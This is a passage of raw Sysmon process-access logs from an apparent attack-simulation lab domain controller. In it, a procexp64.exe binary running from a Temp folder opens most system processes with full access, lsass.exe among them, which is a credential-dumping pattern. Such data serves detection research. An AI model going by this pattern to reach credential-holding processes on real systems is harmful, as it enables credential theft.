15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786329Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786328Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786327Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786326Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786325Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786324Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786323Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786322Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786321Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786320Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786319Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786318Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786317Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786316Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786315Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786314Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786313Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786312Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786311Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786310Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786309Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786308Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786307Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786306Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786305Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786304Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786303Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786302Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786301Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786300Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786299Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786298Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786297Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786296Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786417Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786416Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786415Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786414Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 